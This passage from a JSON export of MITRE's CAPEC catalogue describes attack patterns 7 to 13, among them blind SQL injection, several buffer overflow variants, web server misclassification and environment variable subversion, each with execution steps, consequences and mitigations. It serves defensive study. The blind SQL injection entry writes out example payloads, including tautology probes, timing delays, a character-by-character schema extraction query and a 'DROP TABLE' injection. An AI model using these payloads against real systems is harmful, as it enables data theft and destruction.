[REF-482]"},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"74"},{"CWE_ID":"146"},{"CWE_ID":"184"},{"CWE_ID":"78"},{"CWE_ID":"185"},{"CWE_ID":"697"}]},"References":{"Reference":[{"External_Reference_ID":"REF-1"},{"External_Reference_ID":"REF-482"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"7":{"ID":"7","Name":"Blind SQL Injection","Abstraction":"Detailed","Status":"Draft","Description":"Blind SQL Injection results from an insufficient mitigation for SQL Injection. Although suppressing database error messages are considered best practice, the suppression alone is not sufficient to prevent SQL Injection. Blind SQL Injection is a form of SQL Injection that overcomes the lack of error messages. Without the error messages that facilitate SQL Injection, the adversary constructs input strings that probe the target through simple Boolean SQL expressions. The adversary can determine if the syntax and structure of the injection was successful based on whether the query was executed or not. Applied iteratively, the adversary determines how and where the target is vulnerable to SQL Injection.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"66"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":["[Hypothesize SQL queries in application]",{"p":["Generated hypotheses regarding the SQL queries in an application. For example, the adversary may hypothesize that their input is passed directly into a query that looks like:","Of course, there are many other possibilities."],"div":["\\"SELECT * FROM orders WHERE ordernum = _____\\"",{"style":"margin-left:10px;","class":"informative"}]}],"Technique":"Research types of SQL queries and determine which ones could be used at various places in an application."},{"Step":"2","Phase":"Explore","Description":["[Determine how to inject information into the queries]",{"p":"Determine how to inject information into the queries from the previous step such that the injection does not impact their logic. For example, the following are possible injections for those queries:","div":["\\"5\' OR 1=1; --\\"",{"style":"margin-left:10px;","class":"informative"}]}],"Technique":["Add clauses to the SQL queries such that the query logic does not change.","Add delays to the SQL queries in case server does not provide clear error messages (e.g. WAITFOR DELAY \'0:0:10\' in SQL Server or BENCHMARK(1000000000,MD5(1) in MySQL). If these can be injected into the queries, then the length of time that the server takes to respond reveals whether the query is injectable or not."]},{"Step":"3","Phase":"Experiment","Description":"[Determine user-controllable input susceptible to injection] Determine the user-controllable input susceptible to injection. For each user-controllable input that the adversary suspects is vulnerable to SQL injection, attempt to inject the values determined in the previous step. If an error does not occur, then the adversary knows that the SQL injection was successful.","Technique":["Use web browser to inject input through text fields or through HTTP GET parameters.","Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, etc.","Use network-level packet injection tools such as netcat to inject input","Use modified client (modified by reverse engineering) to inject input."]},{"Step":"4","Phase":"Experiment","Description":"[Determine database type] Determines the type of the database, such as MS SQL Server or Oracle or MySQL, using logical conditions as part of the injected queries","Technique":["Try injecting a string containing char(0x31)=char(0x31) (this evaluates to 1=1 in SQL Server only)","Try injecting a string containing 0x313D31 (this evaluates to 1=1 in MySQL only)","Inject other database-specific commands into input fields susceptible to SQL Injection. The adversary can determine the type of database that is running by checking whether the query executed successfully or not (i.e. whether the adversary received a normal response from the server or not)."]},{"Step":"5","Phase":"Exploit","Description":"[Extract information about database schema] Extract information about database schema by getting the database to answer yes/no questions about the schema.","Technique":["Automatically extract database schema using a tool such as Absinthe.","Manually perform the blind SQL Injection to extract desired information about the database schema."]},{"Step":"6","Phase":"Exploit","Description":"[Exploit SQL Injection vulnerability] Use the information obtained in the previous steps to successfully inject the database in order to bypass checks or modify, add, retrieve or delete data from the database","Technique":"Use information about how to inject commands into SQL queries as well as information about the database schema to execute attacks such as dropping tables, inserting records, etc."}]},"Prerequisites":{"Prerequisite":["SQL queries used by the application to store, retrieve or modify data.","User-controllable input that is not properly validated by the application as part of SQL queries."]},"Skills_Required":{"Skill":["Determining the database type and version, as well as the right number and type of parameters to the query being injected in the absence of error messages requires greater skill than reverse-engineering database error messages.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Indicators":{"Indicator":"The only indicators of successful Blind SQL Injection are the application or database logs that show similar queries with slightly differing logical conditions that increase in complexity over time. However, this requires extensive logging as well as knowledge of the queries that can be used to perform such injection and return meaningful information from the database."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"}]},"Mitigations":{"Mitigation":["Security by Obscurity is not a solution to preventing SQL Injection. Rather than suppress error messages and exceptions, the application must handle them gracefully, returning either a custom error page or redirecting the user to a default page, without revealing any information about the database or the application internals.","Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as SQL content. Keywords such as UNION, SELECT or INSERT must be filtered in addition to characters such as a single-quote(\') or SQL-comments (--) based on the context in which they appear."]},"Example_Instances":{"Example":[{"p":["An adversary may try entering something like \\"username\' AND 1=1; --\\" in an input field. If the result is the same as when the adversary entered \\"username\\" in the field, then the adversary knows that the application is vulnerable to SQL Injection. The adversary can then ask yes/no questions from the database server to extract information from it. For example, the adversary can extract table names from a database using the following types of queries:","If the above query executes properly, then the adversary knows that the first character in a table name in the database is a letter between m and z. If it doesn\'t, then the adversary knows that the character must be between a and l (assuming of course that table names only contain alphabetic characters). By performing a binary search on all character positions, the adversary can determine all table names in the database. Subsequently, the adversary may execute an actual attack and send something like:"],"div":["\\"username\' AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype=\'U\'), 1, 1))) > 108\\".",{"style":"margin-left:10px;","class":"informative"},"\\"username\'; DROP TABLE trades; --",{"style":"margin-left:10px;","class":"informative"}]},"In the PHP application TimeSheet 1.1, an adversary can successfully retrieve username and password hashes from the database using Blind SQL Injection. If the adversary is aware of the local path structure, the adversary can also remotely execute arbitrary code and write the output of the injected queries to the local path. Blind SQL Injection is possible since the application does not properly sanitize the $_POST[\'username\'] variable in the login.php file. See also: CVE-2006-4705"]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"89"},{"CWE_ID":"209"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"697"},{"CWE_ID":"707"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Blind SQL Injection"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Description, Description Summary, Examples-Instances, Payload_Activation_Impact, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"8":{"ID":"8","Name":"Buffer Overflow in an API Call","Abstraction":"Detailed","Status":"Draft","Description":"This attack targets libraries or shared code modules which are vulnerable to buffer overflow attacks. An adversary who has knowledge of known vulnerable libraries or shared code can easily target software that makes use of these libraries. All clients that make use of the code library thus become vulnerable by association. This has a very broad effect on security across a system, usually affecting more than one software process.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"100"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify target application] The adversary, with knowledge of vulnerable libraries or shared code modules, identifies a target application or program that makes use of these."},{"Step":"2","Phase":"Experiment","Description":"[Find injection vector] The adversary attempts to use the API, and if they can they send a large amount of data to see if the buffer overflow attack really does work.","Technique":"Provide large input to a program or application and observe the behavior. If there is a crash, this means that a buffer overflow attack is possible."},{"Step":"3","Phase":"Experiment","Description":"[Craft overflow content] The adversary crafts the content to be injected based on their knowledge of the vulnerability and their desired outcome. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary will craft a set of content that not only overflows the targeted buffer but does so in such a way that the overwritten return address is replaced with one of the adversaries\' choosing which points to code injected by the adversary.","Technique":["Create malicious shellcode that will execute when the program execution is returned to it.","Use a NOP-sled in the overflow content to more easily \\"slide\\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs"]},{"Step":"4","Phase":"Exploit","Description":"[Overflow the buffer] Using the API as the injection vector, the adversary injects the crafted overflow content into the buffer."}]},"Prerequisites":{"Prerequisite":["The target host exposes an API to the user.","One or more API functions exposed by the target host has a buffer overflow vulnerability."]},"Skills_Required":{"Skill":["An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS.",{"Level":"Low"},"Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.",{"Level":"High"}]},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":"Unreliable Execution"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Use a language or compiler that performs automatic bounds checking.","Use secure functions not vulnerable to buffer overflow.","If you have to use dangerous functions, make sure that you do boundary checking.","Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution.","Use OS-level preventative functionality. Not a complete solution."]},"Example_Instances":{"Example":[{"div":["Attack Example: Libc in FreeBSD",{"style":"color:#32498D; font-weight:bold;"}],"p":"A buffer overflow in the FreeBSD utility setlocale (found in the libc module) puts many programs at risk all at once."},{"div":["Xtlib",{"style":"color:#32498D; font-weight:bold;"}],"p":"A buffer overflow in the Xt library of the X windowing system allows local users to execute commands with root privileges."}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"120"},{"CWE_ID":"119"},{"CWE_ID":"118"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"680"},{"CWE_ID":"733"},{"CWE_ID":"697"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Description, Execution_Flow"}]}},"9":{"ID":"9","Name":"Buffer Overflow in Local Command-Line Utilities","Abstraction":"Detailed","Status":"Draft","Description":"This attack targets command-line utilities available in a number of shells. An attacker can leverage a vulnerability found in a command-line utility to escalate privilege to root.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"100"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify target system] The adversary first finds a target system that they want to gain elevated priveleges on. This could be a system they already have some level of access to or a system that they will gain unauthorized access at a lower privelege using some other means."},{"Step":"2","Phase":"Explore","Description":"[Find injection vector] The adversary identifies command line utilities exposed by the target host that contain buffer overflow vulnerabilites. The adversary likely knows which utilities have these vulnerabilities and what the effected versions are, so they will also obtain version numbers for these utilities."},{"Step":"3","Phase":"Experiment","Description":"[Craft overflow command] Once the adversary has found a vulnerable utility, they will use their knownledge of the vulnerabilty to create the command that will exploit the buffer overflow."},{"Step":"4","Phase":"Exploit","Description":"[Overflow the buffer] Using the injection vector, the adversary executes the crafted command, gaining elevated priveleges on the machine."}]},"Prerequisites":{"Prerequisite":["The target host exposes a command-line utility to the user.","The command-line utility exposed by the target host has a buffer overflow vulnerability that can be exploited."]},"Skills_Required":{"Skill":["An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS.",{"Level":"Low"},"Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.",{"Level":"High"}]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Availability","Impact":"Unreliable Execution"},{"Scope":"Confidentiality","Impact":"Read Data"}]},"Mitigations":{"Mitigation":["Carefully review the service\'s implementation before making it available to user. For instance you can use manual or automated code review to uncover vulnerabilities such as buffer overflow.","Use a language or compiler that performs automatic bounds checking.","Use an abstraction library to abstract away risky APIs. Not a complete solution.","Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution.","Operational: Use OS-level preventative functionality. Not a complete solution.","Apply the latest patches to your user exposed services. This may not be a complete solution, especially against a zero day attack.","Do not unnecessarily expose services."]},"Example_Instances":{"Example":{"div":[{"style":"margin-left:10px;","div":["Attack Example: HPUX passwd",{"style":"color:#32498D; font-weight:bold;"},"A buffer overflow in the HPUX passwd command allows local users to gain root privileges via a command-line option."]},{"style":"margin-left:10px;","div":["Attack Example: Solaris getopt",{"style":"color:#32498D; font-weight:bold;"},"A buffer overflow in Solaris\'s getopt command (found in libc) allows local users to gain root privileges via a long argv[0]."]}]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"120"},{"CWE_ID":"118"},{"CWE_ID":"119"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"680"},{"CWE_ID":"733"},{"CWE_ID":"697"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}]}},"10":{"ID":"10","Name":"Buffer Overflow via Environment Variables","Abstraction":"Detailed","Status":"Draft","Description":"This attack pattern involves causing a buffer overflow through manipulation of environment variables. Once the attacker finds that they can modify an environment variable, they may try to overflow associated buffers. This attack leverages implicit trust often placed in environment variables.","Extended_Description":"Although the focus of this attack is putting excessive content into an environment variable that is loaded into a buffer, environment variables can be used to assist a classic buffer overflow attack as well. In the case where the buffer used in a traditional buffer overflow attack is not large enough to store the adversary\'s shell code, they will store the shell code in an environment variable and attempt to return to its address, rather than back into the data they wrote to the buffer.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"100"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify target application] The adversary identifies a target application or program to perform the buffer overflow on. In this attack the adversary looks for an application that loads the content of an environment variable into a buffer."},{"Step":"2","Phase":"Experiment","Description":"[Find injection vector] The adversary identifies an injection vector to deliver the excessive content to the targeted application\'s buffer.","Technique":"Change the values of environment variables thought to be used by the application to contain excessive data. If the program is loading the value of the environment variable into a buffer, this could cause a crash and an attack vector will be found."},{"Step":"3","Phase":"Experiment","Description":"[Craft overflow content] The adversary crafts the content to be injected. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary crafts the payload in such a way that the overwritten return address is replaced with one of the adversary\'s choosing.","Technique":["Create malicious shellcode that will execute when the program execution is returned to it.","Use a NOP-sled in the overflow content to more easily \\"slide\\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs"]},{"Step":"4","Phase":"Exploit","Description":"[Overflow the buffer] Using the injection vector, the adversary injects the crafted overflow content into the buffer."}]},"Prerequisites":{"Prerequisite":["The application uses environment variables.","An environment variable exposed to the user is vulnerable to a buffer overflow.","The vulnerable environment variable uses untrusted data.","Tainted data used in the environment variables is not properly validated. For instance boundary checking is not done before copying the input data to a buffer."]},"Skills_Required":{"Skill":["An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS.",{"Level":"Low"},"Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.",{"Level":"High"}]},"Indicators":{"Indicator":"If the application does bound checking, it should fail when the data source is larger than the size of the destination buffer. If the application\'s code is well written, that failure should trigger an alert."},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":"Unreliable Execution"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Do not expose environment variable to the user.","Do not use untrusted data in your environment variables.","Use a language or compiler that performs automatic bounds checking","There are tools such as Sharefuzz [REF-2] which is an environment variable fuzzer for Unix that support loading a shared library. You can use Sharefuzz to determine if you are exposing an environment variable vulnerable to buffer overflow."]},"Example_Instances":{"Example":[{"div":["Attack Example: Buffer Overflow in $HOME",{"style":"color:#32498D; font-weight:bold;"}],"p":"A buffer overflow in sccw allows local users to gain root access via the $HOME environmental variable."},{"div":["Attack Example: Buffer Overflow in TERM",{"style":"color:#32498D; font-weight:bold;"}],"p":"A buffer overflow in the rlogin program involves its consumption of the TERM environmental variable."}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"120"},{"CWE_ID":"302"},{"CWE_ID":"118"},{"CWE_ID":"119"},{"CWE_ID":"74"},{"CWE_ID":"99"},{"CWE_ID":"20"},{"CWE_ID":"680"},{"CWE_ID":"733"},{"CWE_ID":"697"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Buffer Overflow via Environment Variables"}},"References":{"Reference":[{"External_Reference_ID":"REF-1"},{"External_Reference_ID":"REF-2"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow, Extended_Description"}]}},"11":{"ID":"11","Name":"Cause Web Server Misclassification","Abstraction":"Detailed","Status":"Draft","Description":"An attack of this type exploits a Web server\'s decision to take action based on filename or file extension. Because different file types are handled by different server processes, misclassification may force the Web server to take unexpected action, or expected actions in an unexpected sequence. This may cause the server to exhaust resources, supply debug or system data to the attacker, or bind an attacker to a remote process. This type of vulnerability has been found in many widely used servers including IIS, Lotus Domino, and Orion. The attacker\'s job in this case is straightforward, standard communication protocols and methods are used and are generally appended with malicious information at the tail end of an otherwise legitimate request. The attack payload varies, but it could be special characters like a period or simply appending a tag that has a special meaning for operations on the server side like .jsp for a java application server. The essence of this attack is that the attacker deceives the server into executing functionality based on the name of the request, i.e. login.jsp, not the contents.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"635"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Footprint file input vectors] Manually or using an automated tool, an attacker searches for all input locations where a user has control over the filenames or MIME types of files submitted to the web server.","Technique":["Attacker manually crawls application to identify file inputs","Attacker uses an automated tool to crawl application identify file inputs","Attacker manually assesses strength of access control protecting native application files from user control","Attacker explores potential for submitting files directly to the web server via independently constructed HTTP Requests"]},{"Step":"2","Phase":"Experiment","Description":"[File misclassification shotgunning] An attacker makes changes to file extensions and MIME types typically processed by web servers and looks for abnormal behavior.","Technique":["Attacker submits files with switched extensions (e.g. .php on a .jsp file) to web server.","Attacker adds extra characters (e.g. adding an extra . after the file extension) to filenames of files submitted to web server."]},{"Step":"3","Phase":"Experiment","Description":"[File misclassification sniping] Understanding how certain file types are processed by web servers, an attacker crafts varying file payloads and modifies their file extension or MIME type to be that of the targeted type to see if the web server is vulnerable to misclassification of that type.","Technique":["Craft a malicious file payload, modify file extension to the targeted file type and submit it to the web server.","Craft a malicious file payload, modify its associated MIME type to the targeted file type and submit it to the web server."]},{"Step":"4","Phase":"Exploit","Description":"[Disclose information] The attacker, by manipulating a file extension or MIME type is able to make the web server return raw information (not executed).","Technique":["Manipulate the file names that are explicitly sent to the server.","Manipulate the MIME sent in order to confuse the web server."]}]},"Prerequisites":{"Prerequisite":["Web server software must rely on file name or file extension for processing.","The attacker must be able to make HTTP requests to the web server."]},"Skills_Required":{"Skill":["To modify file name or file extension",{"Level":"Low"},"To use misclassification to force the Web server to disclose configuration information, source, or binary data",{"Level":"Medium"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":"Implementation: Server routines should be determined by content not determined by filename or file extension."},"Example_Instances":{"Example":{"p":["J2EE application servers are supposed to execute Java Server Pages (JSP). There have been disclosure issues relating to Orion Application Server, where an attacker that appends either a period (.) or space characters to the end of a legitimate Http request, then the server displays the full source code in the attackers\' web browser.","Since remote data and directory access may be accessed directly from the JSP, this is a potentially very serious issue.","[REF-6]"],"div":["http://victim.site/login.jsp.",{"style":"margin-left:10px;","class":"attack"}]}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"430"}},"References":{"Reference":[{"External_Reference_ID":"REF-1"},{"External_Reference_ID":"REF-6"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Prerequisites, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances"}]}},"12":{"ID":"12","Name":"Choosing Message Identifier","Abstraction":"Standard","Status":"Draft","Description":"This pattern of attack is defined by the selection of messages distributed over via multicast or public information channels that are intended for another client by determining the parameter value assigned to that client. This attack allows the adversary to gain access to potentially privileged information, and to possibly perpetrate other attacks through the distribution means by impersonation. If the channel/message being manipulated is an input rather than output mechanism for the system, (such as a command bus), this style of attack could be used to change the adversary\'s identifier to more a privileged one.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"PeerOf","CAPEC_ID":"21"},{"Nature":"ChildOf","CAPEC_ID":"216"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"Determine the nature of messages being transported as well as the identifiers to be used as part of the attack"},{"Step":"2","Phase":"Experiment","Description":"If required, authenticate to the distribution channel"},{"Step":"3","Phase":"Experiment","Description":"If any particular client\'s information is available through the transport means simply by selecting a particular identifier, an attacker can simply provide that particular identifier."},{"Step":"4","Phase":"Experiment","Description":"Attackers with client access connecting to output channels could change their channel identifier and see someone else\'s (perhaps more privileged) data."}]},"Prerequisites":{"Prerequisite":["Information and client-sensitive (and client-specific) data must be present through a distribution channel available to all users.","Distribution means must code (through channel, message identifiers, or convention) message destination in a manner visible within the distribution means itself (such as a control channel) or in the messages themselves."]},"Skills_Required":{"Skill":["All the attacker needs to discover is the format of the messages on the channel/distribution means and the particular identifier used within the messages.",{"Level":"Low"}]},"Resources_Required":{"Resource":"The Attacker needs the ability to control source code or application configuration responsible for selecting which message/channel id is absorbed from the public distribution means."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":[{"p":["Associate some ACL (in the form of a token) with an authenticated user which they provide middleware. The middleware uses this token as part of its channel/message selection for that client, or part of a discerning authorization decision for privileged channels/messages.","The purpose is to architect the system in a way that associates proper authentication/authorization with each channel/message."]},"Re-architect system input/output channels as appropriate to distribute self-protecting data. That is, encrypt (or otherwise protect) channels/messages so that only authorized readers can see them."]},"Example_Instances":{"Example":"A certain B2B interface on a large application codes for messages passed over an MQSeries queue, on a single \\"Partners\\" channel. Messages on that channel code for their client destination based on a partner_ID field, held by each message. That field is a simple integer. Attackers having access to that channel, perhaps a particularly nosey partner, can simply choose to store messages of another partner\'s ID and read them as they desire. Note that authentication does not prevent a partner from leveraging this attack on other partners. It simply disallows Attackers without partner status from conducting this attack."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"201"},{"CWE_ID":"306"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Description Summary"},"Previous_Entry_Name":["Choosing a Message/Channel Identifier on a Public/Multicast Channel",{"Date":"2015-12-07"}]}},"13":{"ID":"13","Name":"Subverting Environment Variable Values","Abstraction":"Detailed","Status":"Stable","Description":"The attacker directly or indirectly modifies environment variables used by or controlling the target software. The attacker\'s goal is to cause the target software to deviate from its expected operation in a manner that benefits the attacker.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"77"},{"Nature":"CanPrecede","CAPEC_ID":"14"},{"Nature":"PeerOf","CAPEC_ID":"10"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"The attacker probes the application for information. Which version of the application is running? Are there known environment variables? etc."},{"Step":"2","Phase":"Experiment","Description":"The attacker gains control of an environment variable and ties to find out what process(es) the environment variable controls."},{"Step":"3","Phase":"Exploit","Description":"The attacker modifies the environment variable to abuse the normal flow of processes or to gain access to privileged resources."}]},"Prerequisites":{"Prerequisite":["An environment variable is accessible to the user.","An environment variable used by the application can be tainted with user supplied data.","Input data used in an environment variable is not validated properly.","The variables encapsulation is not done properly. For instance setting a variable as public in a class makes it visible and an attacker may attempt to manipulate that variable."]},"Skills_Required":{"Skill":["In a web based scenario, the client controls the data that it submitted to the server. So anybody can try to send malicious data and try to bypass the authentication mechanism.",{"Level":"Low"},"Some more advanced attacks may require knowledge about protocols and probing technique which help controlling a variable. The malicious user may try to understand the authentication mechanism in order to defeat it.",{"Level":"High"}]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"},{"Scope":"Availability","Impact":"Unreliable Execution"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Accountability","Impact":"Hide 